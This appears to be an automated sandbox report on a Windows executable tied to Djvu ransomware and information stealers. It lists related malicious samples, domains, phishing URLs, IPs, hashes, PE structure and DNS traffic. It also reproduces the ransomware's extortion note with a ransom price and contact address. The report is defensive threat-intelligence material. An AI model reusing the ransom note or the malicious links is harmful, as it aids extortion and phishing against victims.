	file.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, zgRAT	Browse	ftpvoyager.cc/ftp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	humydrole.com/tmp/index.php
	SecuriteInfo.com.Win32.PWSX-gen.24135.19028.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	Amadey	Browse	shohetrc.com/forum/index.php
	file.exe	Get hash	malicious	Amadey	Browse	shohetrc.com/forum/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	dpav.cc/tmp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	file.exe	Get hash	malicious	Eternity Stealer, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar, zgRAT	Browse	149.154.167.99
	PbQI1np5cI.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CinaQ61J8d.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	987123.exe	Get hash	malicious	LummaC, Eternity Stealer, LummaC Stealer, SmokeLoader, Stealc, zgRAT	Browse	149.154.167.99
	H88B1esQF0.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	n8JqyJSXnE.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Stealc	Browse	149.154.167.99
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	149.154.167.99
	http://app.123chat.xyz	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://drsasanranjbar.com/7rnq/?37999091	Get hash	malicious	Unknown	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	https://eek.muf.mybluehost.me/wp-admin/css/colors/blue/MTTRBDFH/	Get hash	malicious	Unknown	Browse	162.241.219.14
	https://thu.muf.mybluehost.me/ddhh/tracking/fV5EjH/msg.php?id=81651192	Get hash	malicious	Unknown	Browse	162.241.226.169
	https://eeq.dfq.mybluehost.me/.website_79ef0269/msolaro/DH2tAyUe9AsUx7b/	Get hash	malicious	HTMLPhisher	Browse	162.241.252.236
	https://iss.phq.mybluehost.me/.website_26dbe1db/support/au/	Get hash	malicious	Unknown	Browse	50.87.180.60
	https://pre.oef.mybluehost.me/net-hu/login	Get hash	malicious	HTMLPhisher	Browse	162.241.252.155
	6101XOxMbY.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	149.154.167.99
	Sz8KLg559F.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	149.154.167.99
	OIpWHA8mdz.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	149.154.167.99
	C7e8AncaYu.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	149.154.167.99
api.2ip.ua	file.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.65.24
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	Mk7woAn6lz.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	6101XOxMbY.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	172.67.139.220
	Sz8KLg559F.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.21.65.24
	OIpWHA8mdz.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	104.21.65.24
	C7e8AncaYu.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.21.65.24
	XrNOw4sxMG.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	172.67.139.220
	7yCti1JQXn.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.65.24
	EdRzQIfoXb.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.65.24
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse	172.67.139.220
	Ksg3dly6oI.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu	Browse	104.21.65.24
	CUO2hN8U9N.exe	Get hash	malicious	Djvu	Browse	172.67.139.220
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.65.24
	UYUuh7vsdN.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	172.67.139.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TechtelLMDSComunicacionesInteractivasSAAR	iJhVD1gfNa.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	186.182.55.44
	Rakitin.x86.elf	Get hash	malicious	Mirai	Browse	181.238.180.248
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	186.13.17.220
	50bA7XFJQI.elf	Get hash	malicious	Mirai	Browse	181.116.130.238
	887OOdJ3rV.elf	Get hash	malicious	Mirai	Browse	181.116.177.213
	C7e8AncaYu.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	186.13.17.220
	BA3TWTDFgH.elf	Get hash	malicious	Mirai	Browse	190.221.103.86
	arm.elf	Get hash	malicious	Mirai	Browse	186.158.116.213
	UiS7Aq9P48.exe	Get hash	malicious	Amadey	Browse	186.182.55.44
	hqw5gwbdid.exe	Get hash	malicious	Amadey	Browse	186.13.17.220
	file.exe	Get hash	malicious	Amadey	Browse	186.182.55.44
	pnhPESGhwt.exe	Get hash	malicious	SmokeLoader	Browse	186.182.55.44
	7X8Zr9Jc2i.exe	Get hash	malicious	SmokeLoader	Browse	186.182.55.44
	5hP4p0wpmv.exe	Get hash	malicious	SmokeLoader	Browse	186.182.55.44
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	186.13.17.220
	Yzkk3B5jl4.elf	Get hash	malicious	Mirai	Browse	181.116.77.22
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	186.13.17.220
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	186.182.55.44
	file.exe	Get hash	malicious	SmokeLoader	Browse	186.182.55.44
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	186.182.55.44
CLOUDFLARENETUS	http://mantegazza.top	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://necowater-my.sharepoint.com/:f:/p/pbaumer/Erb0K2oih7ZBqywMH_sUDHoBVFLWcTTS62zQhkRrJwfJ6Q?e=fWjo1v	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://soma.ecommerceelitesavings.com/selije/soketu/sujo/xadu/index.php?rpclk=2KZDmSG0wJuMEdT1CjEiL0l9B9MgwchP%2F%2BA3u450nnppUch%2FngKb9v2RtmMcIBkEdjCL9SONGxe7bblO%2F1dvDprnQa4adzFEw5qj8TOmnaEI9gva%2FpUggf%2FDaXU5Jrp5xr4G4RlFrxQxsI1h9KknjLq3R6dfmDp6KoRoljmNDA7jGNLag8NZxqO7TjllxC%2FgiuQgjIF0Vj%2BuKgc%2BaebrBhHBZAP6TMVQrxOSAzaXGLgaU0mI3jKnS5NgPugaWlc2WeMrkN%2Fa0yLZM9MPWCfWS0UcKrQxp3xljW%2BbyvAn%2B5NNPw5w9O8bhASKKl5j8cwORnoNwRVRQjw23dX7XwhnC00hy6z2Hpt9yZjUmvizyeLDszdr1NWKukA9QtPvITKeVuPW8h3SOYPOXBxN09bgBS84y6RgTfBrHPIbo7pcbqpu4Yw0LiiWyPQovDFSb0krojfpxkzuC6LM%2BevUr%2FHX0KboL67vnZBlcuMVYVwFKTDGgA57bBJGOQ62YG3bZA5%2FtED3FMem%2F2uuy9WuEvF9zRM5j0jnoAIC%2B3FBE0v94vKUJnQ7S5U9rEZ9iTXLf8SeHepErQWe%2BglHpASlrn6DFq86KSZMK9V6ptBHP4gx3Vcd9%2Bew%2Fs4Ux891MwQh2lz4m6DCK0GPAZw1slwr3v3VyytpST8tX4fK3BiuDuFD8y5x%2FQe13gxGUkmTA1UoWEa99g%2FYypsz%2Ft94CFouFBcJiMnBMLoOdsfndHLxn2inOw0e1k%2BwFcDTGcr9yhLv5F7HOWtviumJZGIyqzLHg3jkd93HQlBiwWP8oVYZN%2B577Zaqq0109B0FRtM8vfbQE3ftIsPWiLzJG5VY8lFlXG3EvZ8OrRZz8jUbTzvFzjd06NOvf%2FM3nmaspqQVymb1rF0RZa9wR5nLWGyl32SoHA%2F1bwx2Cyg15%2Bka0Ek64uJMXtY7Ij54f9lfj8CEpZC%2BSbX%2F7sAEGyT0rvhN%2BHGy9kO4iHwZYCBXNYIzT7XNRQm7Y9OD3PNlqq%2BKL6xCZIcmxSxTSFKHvJ3Rqc5nyNPkOgtEu5lHF2N3MvrS8f25O1aFPr9LhDreEd0Q2qIBVGSGxXbV2C1zekoa3J2qLwsD35VOBOKrlOBHGSuj9UEUe3Wx0o9bN%2FjQVcY3YdnJr3F5m0f2fpTHBzcWX9STml3cgbmxRCqP%2BjlHgxUXb8EpLyc9pFdLyXTa%2B0pz09ce0CjX7WpuxgF4uwPlyNiRwDoU7vsGwtH2utDlja0%2Bvtsw0zrOAeT0WQ7Uco2YZo8Ib10HCtYo%2FFReDxsTanw1Wgr%2FCojoHJ%2Bm03Fv20ShYic0%2BNEVjVfbPSlxF%2BqeTBgPs%2BOLdmP%2Bwvtj%2BFIJP045JQB0CF1vBoRtATmYmQumHUJbKHedgflkmn2R3%2F6RZ%2BTb5HoTRTAYfuzO65vBuUKX6Je5goe1jGY8Rtym7u3MKifTKmGMgOaC%2BAakHW6fETOBwU6XAVEDZt6aViRKpTpTU8KUE4QaphEhp7ZZz%2FbQ8CqnYhr0H34w25OguI%2F68f6hSrf2xsTOPV6Gb5s2vgSpZbQjv8vM7YaxuxVuqDlqQX4o1798SCDUOhBMDbTXlfu0P6UVGdb4q%2B9IRgCGx2AhBBEULtQbnNGgcMKa1Dmljt3%2By%2B59%2Ftu7h0G0cH%2Bvim%2FRCZlFteFZlcSTEVhkiidK4E5W6uDDSgZCP7JkACIFmQ%3D%3D%3A%3Ac2d87b9c8ba8e3dd36ccf81960f15744&p=nQRBuWH7n95GyIkuioRA%3A%3A395fe8b79b379cd44ce28ced98ca4d17	Get hash	malicious	Unknown	Browse	172.67.166.136
	https://descuentosrata.com/redirect?url=http://dir.foundation/-4Gr4RAan-y5l-Qw4RAndquQ3Esm3T-d58Kvo-y5	Get hash	malicious	Unknown	Browse	104.18.214.59
	https://ininpost.top/i	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://ininpost.top/i	Get hash	malicious	Unknown	Browse	1.1.1.1
	nDetalhes_Reserva.ppam	Get hash	malicious	Unknown	Browse	172.67.135.130
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.19.218.90
	VN_Audio_Transcription_182024pm3.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.61.166
	https://sites.google.com/view/miseauthebilnotiverificatopn/accueil	Get hash	malicious	Unknown	Browse	104.21.234.214
	file.exe	Get hash	malicious	Eternity Stealer, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar, zgRAT	Browse	104.21.37.41
	Env#U00edo CFDI FACTURA FFD - A8w1t0A4o3N7D86750507859.html	Get hash	malicious	Unknown	Browse	104.18.36.155
	Env#U00edo CFDI FACTURA FFD - A8w1t0A4o3N7D86750507859.html	Get hash	malicious	Unknown	Browse	172.64.151.101
	https://bzafygtfrdeszqjnhb.s3.eu-west-3.amazonaws.com/unsb6268.html#un/5668_md/2/493/3101/50/905101	Get hash	malicious	Phisher	Browse	1.1.1.1
	1uPo6vy0ih.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	https://bzafygtfrdeszqjnhb.s3.eu-west-3.amazonaws.com/url6268.html#cl/5668_md/2/493/3101/50/905101	Get hash	malicious	Unknown	Browse	104.21.80.104
	http://nightmareautos.com	Get hash	malicious	Unknown	Browse	172.67.158.186
	Email_Rechnung VIP Service VIE Kd. Schatz.smail.html	Get hash	malicious	HTMLPhisher	Browse	104.16.136.15
	http://4oc.aloviec.com/?dD1jJmQ9MjIwNzMmbD01MzI0JmM9ODY4NzgmYXU9MA==	Get hash	malicious	Unknown	Browse	104.21.38.123
	vi3VzdBK4R.exe	Get hash	malicious	FormBook	Browse	104.21.39.249

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Eternity Stealer, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar, zgRAT	Browse	149.154.167.99 172.67.139.220
	otFVzmu0OI.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99 172.67.139.220
	ZLK1m92Anm.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99 172.67.139.220
	th7GMksXzB.exe	Get hash	malicious	Glupteba, Stealc, Vidar	Browse	149.154.167.99 172.67.139.220
	JTGwusI7cICuEzA3R2d19eyBuulw41ON3P7Png.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	JTGwusI7cICuEzA3R2d19eyBuulw41ON3P7Png.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	ep_setup.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	ep_setup.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	aspnet_wp.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	149.154.167.99 172.67.139.220
	newrock.exe	Get hash	malicious	Fabookie, Glupteba, Stealc, Vidar	Browse	149.154.167.99 172.67.139.220
	ftommXF6fk.exe	Get hash	malicious	RedLine, Xmrig	Browse	149.154.167.99 172.67.139.220
	sysrc_trial.exe	Get hash	malicious	zgRAT	Browse	149.154.167.99 172.67.139.220
	sysrc_trial.exe	Get hash	malicious	zgRAT	Browse	149.154.167.99 172.67.139.220
	RrU3GfxdU4.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99 172.67.139.220
	EAQWFBBD.JS.js	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	EAQWFBBD.JS.js	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	Setup.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 172.67.139.220
	PbQI1np5cI.exe	Get hash	malicious	Vidar	Browse	149.154.167.99 172.67.139.220
	CinaQ61J8d.exe	Get hash	malicious	Vidar	Browse	149.154.167.99 172.67.139.220
	bz9agEdrRq.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99 172.67.139.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\sqlite3[1].dll	file.exe	Get hash	malicious	Eternity Stealer, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar, zgRAT	Browse
	PbQI1np5cI.exe	Get hash	malicious	Vidar	Browse
	CinaQ61J8d.exe	Get hash	malicious	Vidar	Browse
	H88B1esQF0.exe	Get hash	malicious	Vidar	Browse
	n8JqyJSXnE.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Stealc	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	OIpWHA8mdz.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse
	XrNOw4sxMG.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse
	n1ppfW1lhW.exe	Get hash	malicious	Vidar	Browse
	7yCti1JQXn.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	EdRzQIfoXb.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	build2.exe	Get hash	malicious	Vidar	Browse
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Setup_Pswrd_1234.rar	Get hash	malicious	Vidar	Browse
	QOPSHkaNOa.exe	Get hash	malicious	Vidar	Browse
	OZEQSPGkT4.exe	Get hash	malicious	Vidar, zgRAT	Browse
C:\Users\user\AppData\Local\8429a2bc-b663-4f4e-846e-76e22b7ae313\kOVwcHSfrR.exe	aiJQkLaTCf.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc	Browse

Process:	C:\Users\user\Desktop\kOVwcHSfrR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1120
Entropy (8bit):	4.871867626503352
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuW4mFRqrn6324kA+GT/kF5M2/kJw3RJDLwp:WZHfv0p6W4Pn42rDGT0f/kiN6
MD5:	577B674A1A30E90A51CC4D48A243D916
SHA1:	3DFAD623A4F2330139276356C43515B9F3D4CD54
SHA-256:	E2B833DC0DA159C2493F7B0F0F26034877F188A3BF2D411236400C92F7F3F6A1
SHA-512:	9AC36F71FA74A3CE01925CAD65AD8246378BEAFD47D9576DAD4258CDF615A32D5B567E8F0F61C072232C4D9CDAFC8B1846182AAF5B2EA06D338E39B1799C3AF7
Malicious:	true
Reputation:	low
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-99MNqXMrdS..Price of private key and decrypt software is $1999...Discount 50% available if you contact us first 72 hours, that's price for you is $999...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshingmail.top....Reserve e-mail addr

Process:	C:\Users\user\AppData\Local\2df19a2c-b539-4ffa-a72b-f2a685ef7f31\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.84785005614839
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	kOVwcHSfrR.exe
File size:	700'416 bytes
MD5:	d3d46d0339ceb24c85568e75f78846a7
SHA1:	36f63066beba540453e1b93e6b1e282aed804234
SHA256:	26bd4a40d12d5483b5cf8a0a2db0dddb151b0b3206079dcf2782834482a2c3b7
SHA512:	d669aaafddb658f88dd6d325883d7b568b9e6b6dc5914b0d7d9d01cf468f0e0521e05e5a7f46e0437e9389470f4f5ec751b416b94412956c2a208b0bccc8227c
SSDEEP:	12288:vE1Gh9OfPNkHH1fl8Zjc38izOfdXacgGeOM0GejX6B:qM9ZZl4mGXjxeOMg4
TLSH:	CFE4222079E18272EA7B6535B854D9A4567BB8B37BB181CB3388523F0E607C14F7931B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......c...........

Entrypoint:	0x403c13
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63B1DA16 [Sun Jan 1 19:08:06 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	8e3dbf4dc3bd1abcd77059b0567f968f

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1aa8	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4c3000	0x7f98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9f1e0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa0e40	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9f000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9df02	0x9e000	False	0.9568381007713608	data	7.943273353110293	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9f000	0x33ee	0x3400	False	0.3694411057692308	SysEx File - Clarity	5.313978609297346	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa3000	0x41fbbc	0x1800	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4c3000	0x7f98	0x8000	False	0.479736328125	data	4.803746591269588	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4c33c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Paraguay	0.43310234541577824
RT_ICON	0x4c4268	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Paraguay	0.5523465703971119
RT_ICON	0x4c4b10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Paraguay	0.5852534562211982
RT_ICON	0x4c51d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Paraguay	0.6033236994219653
RT_ICON	0x4c5740	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Paraguay	0.4446058091286307
RT_ICON	0x4c7ce8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Paraguay	0.4950750469043152
RT_ICON	0x4c8d90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Paraguay	0.5212765957446809
RT_STRING	0x4c9470	0x42a	data	Spanish	Paraguay	0.4540337711069418
RT_STRING	0x4c98a0	0x344	data	Spanish	Paraguay	0.4772727272727273
RT_STRING	0x4c9be8	0x64c	data	Spanish	Paraguay	0.4323821339950372
RT_STRING	0x4ca238	0x45c	data	Spanish	Paraguay	0.45698924731182794
RT_STRING	0x4ca698	0x402	data	Spanish	Paraguay	0.4756335282651072
RT_STRING	0x4caaa0	0x4f6	data	Spanish	Paraguay	0.4440944881889764
RT_ACCELERATOR	0x4c9260	0x40	data	Spanish	Paraguay	0.90625
RT_ACCELERATOR	0x4c92a0	0x30	data	Spanish	Paraguay	0.9583333333333334
RT_GROUP_ICON	0x4c91f8	0x68	data	Spanish	Paraguay	0.6826923076923077
RT_VERSION	0x4c92d0	0x19c	data			0.5728155339805825

DLL	Import
KERNEL32.dll	GetComputerNameW, BackupSeek, GetModuleHandleW, GetProcessHeap, GetConsoleAliasesLengthA, GetWindowsDirectoryA, GetVolumePathNameW, GlobalFindAtomA, LoadLibraryW, GetConsoleMode, WriteConsoleW, EnumResourceLanguagesA, CreateFileW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, SetComputerNameA, OpenMutexA, InterlockedIncrement, DnsHostnameToComputerNameA, CreateHardLinkW, AddAtomW, RemoveDirectoryW, BeginUpdateResourceA, GetCommMask, OpenJobObjectW, FindFirstVolumeMountPointA, FindFirstChangeNotificationA, GetStringTypeW, GetVersionExA, GetWindowsDirectoryW, OpenFileMappingA, SuspendThread, lstrcpyA, DebugActiveProcess, LoadResource, LocalAlloc, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetStartupInfoW, RaiseException, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapFree, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, WideCharToMultiByte, LCMapStringW
USER32.dll	CharLowerBuffA
GDI32.dll	GetDeviceGammaRamp
ADVAPI32.dll	BackupEventLogA
ole32.dll	CoGetPSClsid

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2024 15:46:01.622582912 CET	49949	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:01.804281950 CET	53	49949	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:07.129158020 CET	61032	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:07.133948088 CET	64104	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:08.135138035 CET	64104	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:08.135166883 CET	61032	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:09.150804996 CET	61032	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:09.150834084 CET	64104	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:09.580369949 CET	53	61032	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:09.580399036 CET	53	61032	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:09.580713034 CET	53	61032	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:11.166908979 CET	64104	53	192.168.2.10	1.1.1.1
